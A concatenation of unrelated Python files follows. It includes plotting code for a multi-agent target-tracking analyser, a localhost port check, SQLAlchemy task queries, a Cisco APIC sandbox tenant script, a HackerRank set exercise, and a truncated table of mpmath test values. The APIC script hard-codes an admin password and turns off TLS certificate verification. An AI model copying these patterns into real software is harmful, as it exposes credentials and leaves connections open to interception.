            plot_target_memory_x_y(ax2, element.data_list, curve_label="target" + str(element.target_id) + " - mes",
                                   symb="*", color="gold")
            plot_target_memory_time_agent(ax3, element.data_list,
                                          curve_label="target" + str(element.target_id) + " - mes")
        cb = fig1.colorbar(sc1, ax=ax1)
        cb.ax.yaxis.set_tick_params(labelsize=20)
        # NOTE(review): the sc2 colorbar is disabled; the next line re-styles
        # the same cb created above (a second, redundant call).
        #cb = fig1.colorbar(sc2, ax=ax2)
        cb.ax.yaxis.set_tick_params(labelsize=20)
        fig1.savefig(self.path_to_save_data + self.version + "--rapport1_" + str(self.id), transparent=False)
        fig2.savefig(self.path_to_save_data + self.version + "--rapport2_" + str(self.id), transparent=False)
        plt.close(fig1)
        plt.close(fig2)
    def plot_MSE_prediction_1_target_id(self, target_id):
        # One-step-ahead prediction error: shift measurements one sample back
        # relative to the reference before computing the squared errors.
        try:
            data_ref = []
            data_mes = []
            for element in self.simulated_data_sort_by_target:
                if target_id == int(element.target_id):
                    data_ref = element.data_list
            for element in self.data_sort_by_target:
                if target_id == int(element.target_id):
                    data_mes = element.data_list
            (t_ref, x_ref, y_ref, t_mes, x_mes, y_mes) = get_comparable_data_btw_reference_mesure(data_ref, data_mes)
            """to put the prediction on the real data"""
            x_ref = x_ref[1:]
            y_ref = y_ref[1:]
            t_ref = t_ref[1:]
            x_mes = x_mes[:-1]
            y_mes = y_mes[:-1]
            # NOTE(review): t_mes is rebuilt from t_ref here (not t_mes[:-1]);
            # looks like a typo, but t_mes is unused afterwards — harmless.
            t_mes = t_ref[:-1]
            error_squared_x = error_squared_list(x_ref, x_mes)
            error_squared_y = error_squared_list(y_ref, y_mes)
            error_squared = error_squared_x_y_list(x_ref, y_ref, x_mes, y_mes)
            self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
                                    error_squared)
        except:
            print("plot error : plot_MSE_prediction_1_target_id ")
    def plot_MSE_prediction_2_target_id(self, target_id):
        # Two-step-ahead prediction error (same scheme, shift of 2 samples).
        try:
            data_ref = []
            data_mes = []
            for element in self.simulated_data_sort_by_target:
                if target_id == int(element.target_id):
                    data_ref = element.data_list
            for element in self.data_sort_by_target:
                if target_id == int(element.target_id):
                    data_mes = element.data_list
            (t_ref, x_ref, y_ref, t_mes, x_mes, y_mes) = get_comparable_data_btw_reference_mesure(data_ref, data_mes)
            """to put the prediction on the real data"""
            x_ref = x_ref[2:]
            y_ref = y_ref[2:]
            t_ref = t_ref[2:]
            x_mes = x_mes[:-2]
            y_mes = y_mes[:-2]
            # NOTE(review): same t_ref-based rebuild as the 1-step variant.
            t_mes = t_ref[:-2]
            error_squared_x = error_squared_list(x_ref, x_mes)
            error_squared_y = error_squared_list(y_ref, y_mes)
            error_squared = error_squared_x_y_list(x_ref, y_ref, x_mes, y_mes)
            self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
                                    error_squared)
        except:
            print("plot error: plot_MSE_prediction_2_target_id")
    def plot_MSE_not_interpolate_target_id(self, target_id, remove_outliers=False):
        # Squared error on the raw (non-interpolated) common samples.
        data_ref = []
        data_mes = []
        for element in self.simulated_data_sort_by_target:
            if target_id == int(element.target_id):
                data_ref = element.data_list
        for element in self.data_sort_by_target:
            if target_id == int(element.target_id):
                data_mes = element.data_list
        try:
            (t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
             error_squared) = error_squared_discrete(
                data_ref, data_mes, remove_outliers)
            self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
                                    error_squared)
        except:
            print("error plot : plot_MSE_not_interpolate_target_id")
            import traceback
            traceback.print_exc()
    def plot_MSE_interpolate_target_id(self, target_id):
        # Interpolated-trajectory comparison: reference vs measured positions,
        # coloured by time, marker size scaled by target radius.
        try:
            data_ref = []
            data_mes = []
            for element in self.simulated_data_sort_by_target:
                if target_id == int(element.target_id):
                    data_ref = element.data_list
            for element in self.data_sort_by_target:
                if target_id == int(element.target_id):
                    data_mes = element.data_list
            (t_ref, x_ref, y_ref, x_mes, y_mes) = error_squared_with_interpolation(data_ref, data_mes)
            fig = plt.figure(figsize=(12, 8))
            fig.suptitle('Agent ' + str(self.id), fontsize=17, fontweight='bold', y=0.98)
            fig.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
            ax1 = fig.add_subplot(1, 2, 1)
            ax2 = fig.add_subplot(1, 2, 2)
            plot_graph_x_y(ax1, data_ref[X_INDEX], data_ref[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
                           curve_label="interpolation_ref")
            plot_graph_x_y(ax2, data_ref[X_INDEX], data_ref[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
                           curve_label="interpolation_ref")
            plot_graph_x_y(ax2, data_mes[X_INDEX], data_mes[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
                           curve_label="interpolation_ref")
            sc1 = ax1.scatter(np.array(x_ref), np.array(y_ref), c=np.array(t_ref),
                              s=2500 * math.pow(data_ref[RADIUS_INDEX][0], 2) * math.pi, vmin=T_MIN, vmax=T_MAX,
                              cmap="Spectral",
                              alpha=0.4)
            sc2 = ax2.scatter(np.array(x_mes), np.array(y_mes), c=np.array(t_ref),
                              s=2500 * math.pow(data_ref[RADIUS_INDEX][0], 2) * math.pi, vmin=T_MIN, vmax=T_MAX,
                              cmap="Spectral",
                              alpha=0.4)
            fig.colorbar(sc1, ax=ax1)
            fig.colorbar(sc2, ax=ax2)
            fig.savefig(self.path_to_save_data + self.version + "--Interpolation_agent_" + str(self.id),
                        transparent=False)
            plt.close(fig)
        except:
            print("error plot : plot_MSE_interpolate_target_id")
    def plot_MES_target_id(self, target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
                           error_squared):
        # Shared renderer for the MSE variants above: trajectory plus the
        # squared-error curves (x-y norm, x, y) with their mean lines.
        try:
            fig = plt.figure(figsize=(12, 8), tight_layout=True)
            ax = fig.add_subplot(3, 2, (1, 3))
            ax1 = fig.add_subplot(3, 2, (5, 6))
            ax2 = fig.add_subplot(3, 2, 2)
            ax3 = fig.add_subplot(3, 2, 4)
            mean_error_squared_x = np.mean(error_squared_x)
            mean_error_squared_y = np.mean(error_squared_y)
            mean_error_squared_x_y = np.mean(error_squared)
            sc = ax.scatter(x_ref, y_ref, s=100, c=t_ref, cmap="Spectral", alpha=0.4)
            # NOTE(review): x/y positions passed to a "time_x" plot helper
            # here — presumably just reusing its line style; confirm.
            plot_graph_time_x(ax, x_ref, y_ref, "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
                              curve_label="generated data (reference)")
            plot_graph_x_y(ax, x_mes, y_mes, "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
                           curve_label="measured data")
            plot_graph_time_x(ax1, t_ref, error_squared, "squared error norm x-y", "time [s]", "[m^2]",
                              curve_label="measured squared error")
            plot_graph_time_x(ax2, t_ref, error_squared_x, "squared error norm x", "time [s]", "[m^2]",
                              curve_label="measured squared error")
            plot_graph_time_x(ax3, t_ref, error_squared_y, "squared norm y", "time [s]", "[m^2]",
                              curve_label="measured squared error")
            plot_graph_time_x(ax1, t_ref, mean_error_squared_x_y * np.ones(np.size(t_ref)),
                              "squared error norm x-y", "time [s]", "[m^2]", curve_label="mean squared error")
            plot_graph_time_x(ax2, t_ref, mean_error_squared_x * np.ones(np.size(t_ref)), "squared error norm x",
                              "time [s]", "[m^2]",
                              curve_label="mean squared error")
            plot_graph_time_x(ax3, t_ref, mean_error_squared_y * np.ones(np.size(t_ref)), "squared norm y", "time [s]",
                              "[m^2]", curve_label="mean squared error")
            # Annotate each error subplot with the RMS value.
            (yb, yh) = ax1.get_ylim()
            ax1.text(0, yh, "mean error = %.2f m" % (np.sqrt(mean_error_squared_x_y)), fontweight='bold', fontsize=10)
            (yb, yh) = ax2.get_ylim()
            ax2.text(0, yb, "mean error = %.2f m" % (np.sqrt(mean_error_squared_x)), fontweight='bold', fontsize=10)
            (yb, yh) = ax3.get_ylim()
            ax3.text(0, yb, "mean error = %.2f m" % (np.sqrt(mean_error_squared_y)), fontweight='bold', fontsize=10)
            fig.colorbar(sc, ax=ax)
            fig.savefig(
                self.path_to_save_data + self.version + "--MSE_agent_" + str(self.id) + "-target_" + str(target_id),
                transparent=False)
            plt.close(fig)
        except:
            print("error plot : plot_MES_target_id")
    def plot_position_target_simulated_data_collected_data(self):
        # Side-by-side reference (left) vs measured (right) trajectories,
        # coloured by time, saved as "--position_agent_<id>".
        try:
            if self.id == "":
                title = 'Ideal solution ' + str(self.id)
            elif int(self.id) < 100:
                title = 'Agent Camera ' + str(self.id)
            else:
                title = 'Agent User ' + str(self.id)
            fig_position = plt.figure(figsize=(12, 8))
            fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
            fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
            ax1 = fig_position.add_subplot(1, 2, 1)
            ax2 = fig_position.add_subplot(1, 2, 2)
            for element in self.simulated_data_sort_by_target:
                sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - ref")
            for element in self.data_sort_by_target:
                sc2 = plot_target_memory_time_x_y_2D(ax2, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - mes")
            fig_position.colorbar(sc1, ax=ax1)
            fig_position.colorbar(sc2, ax=ax2)
            fig_position.savefig(self.path_to_save_data + self.version + "--position_agent_" + str(self.id),
                                 transparent=False)
            plt.close(fig_position)
        except:
            print("error plot : plot_position_target_simulated_data_collected_data")
    def plot_generated_local_filter(self):
        # NOTE(review): byte-for-byte duplicate of
        # plot_position_target_simulated_data_collected_data (it even writes
        # the same "--position_agent_<id>" file) — candidate for removal or
        # delegation.
        try:
            if self.id == "":
                title = 'Ideal solution ' + str(self.id)
            elif int(self.id) < 100:
                title = 'Agent Camera ' + str(self.id)
            else:
                title = 'Agent User ' + str(self.id)
            fig_position = plt.figure(figsize=(12, 8))
            fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
            fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
            ax1 = fig_position.add_subplot(1, 2, 1)
            ax2 = fig_position.add_subplot(1, 2, 2)
            for element in self.simulated_data_sort_by_target:
                sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - ref")
            for element in self.data_sort_by_target:
                sc2 = plot_target_memory_time_x_y_2D(ax2, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - mes")
            fig_position.colorbar(sc1, ax=ax1)
            fig_position.colorbar(sc2, ax=ax2)
            fig_position.savefig(self.path_to_save_data + self.version + "--position_agent_" + str(self.id),
                                 transparent=False)
            plt.close(fig_position)
        except:
            print("error plot : plot_position_target_simulated_data_collected_data")
    def plot_all_target_simulated_data_collected_data(self):
        # 2x2 overview (time / type / agent colourings + agent-vs-time) across
        # all targets, saved as "--general_agent_<id>".
        fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
        if self.id == "":
            title = 'Ideal solution ' + str(self.id)
        elif int(self.id) < 100:
            title = 'Agent Camera ' + str(self.id)
        else:
            title = 'Agent User ' + str(self.id)
        fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
        ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
        ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
        ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
        ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
        try:
            for element in self.simulated_data_sort_by_target:
                sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - ref")
            for element in self.data_sort_by_target:
                plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - mes")
                sc2 = plot_target_memory_type_x_y_2D(ax2, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - mes")
                sc3 = plot_target_memory_agent_x_y_2D(ax3, element.data_list,
                                                      curve_label="target" + str(element.target_id) + " - mes")
                plot_target_memory_time_agent(ax4, element.data_list,
                                              curve_label="target" + str(element.target_id) + " - mes")
            fig_time_type_x_y.colorbar(sc1, ax=ax1)
            fig_time_type_x_y.colorbar(sc2, ax=ax2)
            fig_time_type_x_y.colorbar(sc3, ax=ax3)
            fig_time_type_x_y.savefig(self.path_to_save_data + self.version + "--general_agent_" + str(self.id),
                                      transparent=False)
            plt.close(fig_time_type_x_y)
        except:
            print("error plot: plot_all_target_simulated_data_collected_data")
    def plot_a_target_simulated_data_collected_data(self, target_id):
        # Same 2x2 overview restricted to one target id, saved as
        # "--general_agent_<id>-target_<target_id>".
        fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
        if self.id == "":
            title = 'Ideal solution ' + str(self.id)
        elif int(self.id) < 100:
            title = 'Agent Camera ' + str(self.id)
        else:
            title = 'Agent User ' + str(self.id)
        fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
        ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
        ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
        ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
        ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
        try:
            for element in self.simulated_data_sort_by_target:
                if target_id == int(element.target_id):
                    sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                         curve_label="target " + str(element.target_id) + " - ref")
            for element in self.data_sort_by_target:
                if target_id == int(element.target_id):
                    plot_target_memory_x_y(ax1, element.data_list,
                                           curve_label="target " + str(element.target_id) + " - mes")
                    sc2 = plot_target_memory_type_x_y_2D(ax2, element.data_list,
                                                         curve_label="target" + str(element.target_id) + " - mes")
                    sc3 = plot_target_memory_agent_x_y_2D(ax3, element.data_list,
                                                          curve_label="target" + str(element.target_id) + " - mes")
                    plot_target_memory_time_agent(ax4, element.data_list,
                                                  curve_label="target" + str(element.target_id) + " - mes")
            fig_time_type_x_y.colorbar(sc1, ax=ax1)
            fig_time_type_x_y.colorbar(sc2, ax=ax2)
            fig_time_type_x_y.colorbar(sc3, ax=ax3)
            fig_time_type_x_y.savefig(self.path_to_save_data + self.version + "--general_agent_" + str(
                self.id) + "-target_" + str(target_id), transparent=False)
        except:
            print("plot_a_target_simulated_data_collected_data")
        plt.close(fig_time_type_x_y)
class Analyser_Agent_Target_TargetEstimator_FormatCSV:
    """Like Analyser_Target_TargetEstimator_FormatCSV, but groups the measured
    data per agent first (then per target), so multi-agent contributions can
    be plotted against the simulation reference.

    NOTE(review): plotting methods use bare ``except:`` + print, silently
    swallowing all failures.
    """
    def __init__(self, agent_id, path_to_load_data, path_to_save_data, version="version"):
        self.id = agent_id
        self.version = version
        self.path_to_save_data = path_to_save_data
        self.data = load_csv_file_dictionnary(path_to_load_data + str(agent_id))
        self.simulated_data = load_csv_file_dictionnary(constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE)
        # Measured rows nested agent -> target; reference rows per target.
        self.data_sort_by_agent_target = []
        self.simulated_data_sort_by_target = []
        init_analyse_memory_all_agent(self.data, self.data_sort_by_agent_target)
        init_analyse_memory_agent(self.simulated_data, self.simulated_data_sort_by_target)
    def plot_position_target_simulated_data_collected_data(self):
        # Reference (left) vs all-agent measured (right) trajectories,
        # coloured by time; written into the shared all-agent plot folder.
        try:
            if self.id == "":
                title = 'Ideal solution ' + str(self.id)
            elif int(self.id) < 100:
                title = 'Agent Camera ' + str(self.id)
            else:
                title = 'Agent User ' + str(self.id)
            fig_position = plt.figure(figsize=(12, 8))
            fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
            fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
            ax1 = fig_position.add_subplot(1, 2, 1)
            ax2 = fig_position.add_subplot(1, 2, 2)
            for element in self.simulated_data_sort_by_target:
                sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " - ref")
            for element_agent in self.data_sort_by_agent_target:
                for element_target in element_agent.data_list:
                    sc2 = plot_target_memory_time_x_y_2D(ax2, element_target.data_list,
                                                         curve_label="agent" + str(
                                                             element_agent.agent_id) + "-target" + str(
                                                             element_target.target_id) + " - mes")
            fig_position.colorbar(sc1, ax=ax1)
            fig_position.colorbar(sc2, ax=ax2)
            fig_position.savefig(
                constants.ResultsPath.SAVE_LOAD_PLOT_MEMORY_ALL_AGENT + self.version + "--position_all_agent_" + str(
                    self.id),
                transparent=False)
            plt.close(fig_position)
        except:
            print("plot_position_target_simulated_data_collected_data")
    def plot_all_target_simulated_data_collected_data(self):
        # 2x2 overview (time / type / agent colourings + agent-vs-time) with
        # one curve per (agent, target) pair.
        try:
            if self.id == "":
                title = 'Ideal solution ' + str(self.id)
            elif int(self.id) < 100:
                title = 'Agent Camera ' + str(self.id)
            else:
                title = 'Agent User ' + str(self.id)
            fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
            fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
            ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
            ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
            ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
            ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
            for element in self.simulated_data_sort_by_target:
                sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
                                                     curve_label="target" + str(element.target_id) + " -ref")
            for element_agent in self.data_sort_by_agent_target:
                for element_target in element_agent.data_list:
                    plot_target_memory_x_y(ax1, element_target.data_list,
                                           curve_label="agent-" + str(element_agent.agent_id)
                                                       + ",target-" + str(
                                               element_target.target_id))
                    sc2 = plot_target_memory_type_x_y_2D(ax2, element_target.data_list,
                                                         curve_label="agent-" + str(element_agent.agent_id)
                                                                     + ",target-" + str(
                                                             element_target.target_id) + " - mes")
                    sc3 = plot_target_memory_agent_x_y_2D(ax3, element_target.data_list,
                                                          curve_label="agent-" + str(element_agent.agent_id)
                                                                      + ",target-" + str(
                                                              element_target.target_id) + " - mes")
                    plot_target_memory_time_agent(ax4, element_target.data_list,
                                                  curve_label="agent-" + str(element_agent.agent_id)
                                                              + ",target-" + str(element_target.target_id) + " - mes")
            fig_time_type_x_y.colorbar(sc1, ax=ax1)
            fig_time_type_x_y.colorbar(sc2, ax=ax2)
            fig_time_type_x_y.colorbar(sc3, ax=ax3)
            fig_time_type_x_y.savefig(
                constants.ResultsPath.SAVE_LOAD_PLOT_MEMORY_ALL_AGENT + self.version + "--general_agent_" + str(
                    self.id),
                transparent=False)
            plt.close(fig_time_type_x_y)
        except:
            print("plot_all_target_simulated_data_collected_data")
if __name__ == '__main__':
    # Standalone analysis run against one saved simulation.
    constants.ResultsPath.folder = "../../results"
    constants.ResultsPath.name_simulation = "attractiv_combine"
    # An empty agent id selects the reference ("ideal solution") data set.
    # NOTE(review): SAVE_LAOD_PLOT_FOLDER looks misspelled, but presumably
    # mirrors the constant's actual name in `constants` — verify before fixing.
    analyser_simulated_data = Analyser_Target_TargetEstimator_FormatCSV("",
                                                                        constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE,
                                                                        constants.ResultsPath.SAVE_LAOD_PLOT_FOLDER)
    analyser_simulated_data.plot_all_target_simulated_data_collected_data()
|
import socket
def check_port(port: int):
    """Probe TCP *port* on localhost; returns normally if something is
    listening, otherwise raises (OSError / socket.timeout after 3 s).

    Bug fix: the socket was never closed — it leaked on success and whenever
    connect() raised.  The context manager guarantees close() on every path.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(3)
        s.connect(("127.0.0.1", port))
        s.shutdown(socket.SHUT_RDWR)  # same as the original shutdown(2)
|
from model.ModelSqlite import db, Task, Action, Order, TaskType
from sqlalchemy import and_, func
def save(task):
    """Persist *task* in the current session and return it."""
    session = db.session
    session.add(task)
    session.commit()
    return task
def load_by_date(sumary_date):
    """Return (Task, Action, TaskType, Order) tuples for actions initialised
    on or after *sumary_date*, one row per task."""
    session = db.session
    query = (
        session.query(Task, Action, TaskType, Order)
        .join(Action, Action.task_id == Task.id)
        .join(TaskType, TaskType.id == Task.type_id)
        .outerjoin(Order, Order.id == Task.order_id)
        .filter(Action.init >= sumary_date)
        .group_by(Task.id)
    )
    return query.all()
def load_by_search(search):
    """Search tasks by order number (numeric *search*) or by task-type name,
    returning (Task, Action, TaskType, Order) tuples, one row per task.

    Bug fix: the original chained ``.group_by(Task.id)`` twice; applying it
    once is sufficient.
    """
    filters = [Order.number == search] if search.isnumeric() else [TaskType.name == search]
    query = db.session.query(Task, Action, TaskType, Order) \
        .join(Action, Action.task_id == Task.id) \
        .join(TaskType, TaskType.id == Task.type_id) \
        .outerjoin(Order, Order.id == Task.order_id) \
        .filter(and_(*filters)) \
        .group_by(Task.id)
    return query.all()
def load_by_id(id: int):
    """Return the Task with the given primary key, or None if absent.
    NOTE(review): the parameter shadows the builtin `id`; name kept for callers."""
    query = Task.query.filter(Task.id == id)
    return query.first()
def set_order(order):
    """Attach *order* to its task by writing order.id into the task row."""
    session = db.session
    session.query(Task).filter(Task.id == order.task_id).update({"order_id": order.id})
    session.commit()
|
import requests
import json
""" get Token """
def get_token(APIC):
    """Authenticate against the APIC at *APIC* and return the session token."""
    login_url = f"https://{APIC}/api/aaaLogin.json"
    # NOTE(review): hard-coded DevNet sandbox credentials — acceptable for the
    # lab, but move to config/env vars before any real deployment.
    credentials = {
        "aaaUser": {
            "attributes": {
                "name":"admin",
                "pwd":"C1sco12345"
            }
        }
    }
    json_headers = {
        "Content-Type" : "application/json"
    }
    # Self-signed sandbox certificate: silence the insecure-request warnings.
    requests.packages.urllib3.disable_warnings()
    login_response = requests.post(login_url, data=json.dumps(credentials),
                                   headers=json_headers, verify=False).json()
    return login_response['imdata'][0]['aaaLogin']['attributes']['token']
def my_post(URL, payload, token=None):
    """POST *payload* as JSON to *URL*, optionally authenticating with an
    APIC token cookie; returns the raw requests.Response.

    Fixes: compare to None with ``is`` (idiom), and build the headers once
    instead of duplicating the dict in both branches.  TLS verification is
    disabled (sandbox use).
    """
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    if token is not None:
        headers["Cookie"] = f"APIC-Cookie={token}"
    requests.packages.urllib3.disable_warnings()
    return requests.post(URL, data=json.dumps(payload), headers=headers, verify=False)
def my_get(URL, token=None):
    """GET *URL*, optionally authenticating with an APIC token cookie;
    returns the raw requests.Response.

    Fixes: compare to None with ``is`` (idiom), and build the headers once
    instead of duplicating the dict in both branches.  TLS verification is
    disabled (sandbox use).
    """
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    if token is not None:
        headers["Cookie"] = f"APIC-Cookie={token}"
    requests.packages.urllib3.disable_warnings()
    return requests.get(URL, headers=headers, verify=False)
def printj(json_object):
    """Pretty-print *json_object* as indented, key-sorted JSON.

    Accepts a dict, a list (only the first element is printed, preserving the
    historical behaviour), a JSON-encoded str, or JSON-encoded bytes.

    Bug fixes: the original re-parsed the formatted string with json.loads()
    before printing, which discarded the indentation and printed a Python
    repr; the str/bytes branches also never parsed their JSON payload, so
    they printed raw text.  isinstance() replaces ``type(x) is``.
    """
    if isinstance(json_object, list):
        json_formatted_str = json.dumps(json_object[0], indent=4, sort_keys=True)
    elif isinstance(json_object, dict):
        json_formatted_str = json.dumps(json_object, indent=4, sort_keys=True)
    elif isinstance(json_object, str):
        try:
            json_formatted_str = json.dumps(json.loads(json_object), indent=4, sort_keys=True)
        except json.JSONDecodeError:
            json_formatted_str = json_object  # not JSON: print it as-is
    elif isinstance(json_object, bytes):
        try:
            json_formatted_str = json.dumps(json.loads(json_object.decode("utf-8")), indent=4, sort_keys=True)
        except json.JSONDecodeError:
            json_formatted_str = json_object.decode("utf-8")
    else:
        json_formatted_str = "Dont know how to print: " + str(type(json_object))
    print(json_formatted_str)
def main():
    """Create a test tenant on the sandbox APIC, then list all tenants."""
    APIC = "10.10.20.14"
    token = get_token(APIC)
    print("The token is: " + token)
    # Create the tenant.
    NAME = "test-Leu"
    DN = f"tn-{NAME}"
    URL = f"https://{APIC}/api/node/mo/uni/{DN}.json"
    payload = {"fvTenant":{"attributes":{"dn":f"uni/{DN}","name":NAME,"nameAlias":NAME,"rn":DN,"status":"created"},"children":[]}}
    response = my_post(URL, payload, token)
    print("\nResponse code ["+str(response.status_code)+"] Create tenant : \n")
    printj(response.content)
    # List all tenants.
    url = f"https://{APIC}/api/node/class/fvTenant.json"
    # Bug fix: the original issued my_get(URL, ...) — reusing the
    # tenant-create endpoint — instead of the class-query URL built above.
    # (The unused empty payload reassignment is also gone.)
    response = my_get(url, token)
    print("\nResponse code ["+str(response.status_code)+"] tenant list: \n")
    printj(response.content)
if __name__ == "__main__":
    main()
# Python > Sets > Symmetric Difference
# Learn about sets as a data type.
#
# https://www.hackerrank.com/challenges/symmetric-difference/problem
#
# Read both set sizes (consumed but unused: the sets define their own length)
# followed by the space-separated elements of each set.
m = int(input())
M = set(map(int, input().split()))
n = int(input())
N = set(map(int, input().split()))
# Idiom fix: (M - N).union(N - M) reimplements the built-in symmetric
# difference operator.
for value in sorted(M ^ N):
    print(value)
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
# Work at the shared unit-testing precision (decimal places for mpmath).
mp.dps = precision
# Auto-generated regression baselines, keyed by test name (populated below).
trusted_values_dict = {}
# Generated on: 2019-11-26
trusted_values_dict['GRMHD__generate_everything_for_UnitTesting__globals'] = {'GRHDT4UU[0][0]': mpf('-2.3394549490075809540461930203703'), 'GRHDT4UU[0][1]': mpf('2.67395385292607006300096827671314'), 'GRHDT4UU[0][2]': mpf('0.939965144645438226830568588005522'), 'GRHDT4UU[0][3]': mpf('2.76759751772851491817709721309047'), 'GRHDT4UU[1][0]': mpf('2.67395385292607006300096827671314'), 'GRHDT4UU[1][1]': mpf('1.3371421668550838437046466896128'), 'GRHDT4UU[1][2]': mpf('-1.05274338618835252181323562334257'), 'GRHDT4UU[1][3]': mpf('-0.11457605315808485745489330153845'), 'GRHDT4UU[2][0]': mpf('0.939965144645438226830568588005522'), 'GRHDT4UU[2][1]': mpf('-1.05274338618835252181323562334257'), 'GRHDT4UU[2][2]': mpf('-1.73967973788547621712965727684159'), 'GRHDT4UU[2][3]': mpf('1.31193965191419717041027546492757'), 'GRHDT4UU[3][0]': mpf('2.76759751772851491817709721309047'), 'GRHDT4UU[3][1]': mpf('-0.11457605315808485745489330153845'), 'GRHDT4UU[3][2]': mpf('1.31193965191419717041027546492757'), 'GRHDT4UU[3][3]': mpf('-0.604443288062090381548088559383374'), 'GRFFET4UU[0][0]': mpf('5991.56954097030513738270514757149'), 'GRFFET4UU[0][1]': mpf('-6598.52015499156408677448047649955'), 'GRFFET4UU[0][2]': mpf('-2343.18579534750494129000780465075'), 'GRFFET4UU[0][3]': mpf('-6968.06092890997670993374272963683'), 'GRFFET4UU[1][0]': mpf('-6598.52015499156408677448047649955'), 'GRFFET4UU[1][1]': mpf('-2466.3090636462143709789502824391'), 'GRFFET4UU[1][2]': mpf('2908.65775887537152658374734421312'), 'GRFFET4UU[1][3]': mpf('808.033384967900271741702359802519'), 'GRFFET4UU[2][0]': mpf('-2343.18579534750494129000780465075'), 'GRFFET4UU[2][1]': mpf('2908.65775887537152658374734421312'), 'GRFFET4UU[2][2]': mpf('4487.54461021648368811305964573659'), 'GRFFET4UU[2][3]': mpf('-3218.73486933020079468156482621409'), 'GRFFET4UU[3][0]': mpf('-6968.06092890997670993374272963683'), 'GRFFET4UU[3][1]': mpf('808.033384967900271741702359802519'), 'GRFFET4UU[3][2]': mpf('-3218.73486933020079468156482621409'), 
'GRFFET4UU[3][3]': mpf('1766.31736072850622241146184994002'), 'T4UU[0][0]': mpf('5989.23008602129755642865895455095'), 'T4UU[0][1]': mpf('-6595.84620113863801671147950822353'), 'T4UU[0][2]': mpf('-2342.24583020285950306317723606236'), 'T4UU[0][3]': mpf('-6965.293331392248195015565632424'), 'T4UU[1][0]': mpf('-6595.84620113863801671147950822353'), 'T4UU[1][1]': mpf('-2464.97192147935928713524563574923'), 'T4UU[1][2]': mpf('2907.60501548918317406193410858997'), 'T4UU[1][3]': mpf('807.918808914742186884247466500894'), 'T4UU[2][0]': mpf('-2342.24583020285950306317723606236'), 'T4UU[2][1]': mpf('2907.60501548918317406193410858997'), 'T4UU[2][2]': mpf('4485.80493047859821189592998845987'), 'T4UU[2][3]': mpf('-3217.42292967828659751115455074876'), 'T4UU[3][0]': mpf('-6965.293331392248195015565632424'), 'T4UU[3][1]': mpf('807.918808914742186884247466500894'), 'T4UU[3][2]': mpf('-3217.42292967828659751115455074876'), 'T4UU[3][3]': mpf('1765.71291744044413202991376138024'), 'T4UD[0][0]': mpf('-6870.50023105853469095799608311124'), 'T4UD[0][1]': mpf('-2324.03676683773283401262026874044'), 'T4UD[0][2]': mpf('-1841.79584721496995247167903618172'), 'T4UD[0][3]': mpf('-3343.37979075962099673446089303178'), 'T4UD[1][0]': mpf('-8534.95747250755649982597017952808'), 'T4UD[1][1]': mpf('-6501.89969848888732111993178265964'), 'T4UD[1][2]': mpf('-3449.35227632433778077394214094721'), 'T4UD[1][3]': mpf('-6193.86931383808158341657221278966'), 'T4UD[2][0]': mpf('-1990.18153461046463468207070624917'), 'T4UD[2][1]': mpf('-992.505392772397307812120386705513'), 'T4UD[2][2]': mpf('-3048.94486605175226958188078316937'), 'T4UD[2][3]': mpf('-1444.59289633008084150679689134761'), 'T4UD[3][0]': mpf('-9225.51016918139086571548509646491'), 